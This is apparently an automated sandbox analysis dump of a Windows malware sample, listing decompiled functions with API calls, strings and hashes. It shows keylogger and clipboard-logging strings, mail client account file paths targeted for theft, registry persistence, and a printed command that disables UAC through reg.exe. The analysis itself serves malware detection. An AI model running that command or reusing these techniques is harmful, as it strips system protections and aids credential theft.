                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                                                                                                                                                              Function 004426E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 00442724
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004427EF
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004427F9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                                              • String ID: @)|$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 2506810119-2166363405
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                                                                                                                                                                                                                              Function 10014CE5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 10014D25
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10014DF0
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10014DFA
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                                              • String ID: @)|$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 2506810119-2166363405
                                                                                                                                                                                                                                                                                                                              • Opcode ID: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1e7dba0bb730f9fc9de03a9782a9729fb1a7a61e514cee30f29b5b303d88c0bb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83316175A00258AFDB11DF95DC81D9EBBFCEB89750B2140A6F8049B221DA71DA81CB91
                                                                                                                                                                                                                                                                                                                              Function 028311EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831E89: lstrlenW.KERNEL32(?,?,?,?,?,028310DF,?,?,?,00000000), ref: 02831E9A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831E89: lstrcatW.KERNEL32(?,?,?,028310DF,?,?,?,00000000), ref: 02831EAC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831E89: lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EB3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831E89: lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EC8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831E89: lstrcatW.KERNEL32(?,028310DF,?,028310DF,?,?,?,00000000), ref: 02831ED3
                                                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 0283122A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283173A: _strlen.LIBCMT ref: 02831855
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283173A: _strlen.LIBCMT ref: 02831869
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 571a8e41b62d2d63e403ba4be848f7138d0e6c3e1d1cfc2e46ce0c69a3133fc9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f262137d9a6ed56639b9e39bcba6b2e23ffc99e350cd6bdd16e246a422f8463a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 571a8e41b62d2d63e403ba4be848f7138d0e6c3e1d1cfc2e46ce0c69a3133fc9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F21C57DE502086AEB119794EC95FED733AEF40B14F000556F609EB1D0EAB11D818B99
                                                                                                                                                                                                                                                                                                                              Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                                                                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2974294136-4018440003
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c117b7f367b9304699cb782ee20f691843938ea7b4bd2726d92bc9b86e508ced
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c117b7f367b9304699cb782ee20f691843938ea7b4bd2726d92bc9b86e508ced
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                                                                                                                                                                                                                              Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                                                                                                                                                              • API String ID: 1497725170-248792730
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 755c7460b0b132dcd3f9b92c429dc6884fba287314c4a0569a9e271944d3b7b5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 755c7460b0b132dcd3f9b92c429dc6884fba287314c4a0569a9e271944d3b7b5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                                                                                                                                                                                                                              Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                                                                                                                              • String ID: `AG
                                                                                                                                                                                                                                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ebf0acc99a1bd76ecb676338ad5ca66b749e389f9c6bdc81adf82034e374675
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                                                                                                                                                              Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                                                                                                                                                                                                                              Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                                                                                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 2922976086-4183131282
                                                                                                                                                                                                                                                                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                                                                                                                                                                                                                              Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                                                                                                                                                                                                                                              Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 1818849710-2233081382
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 225f6d3dbd6fb53d41383bb79f5c3d85c0f86ed4bf7db3091f23b13824b490fe
                                                                                                                                                                                                                                                                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
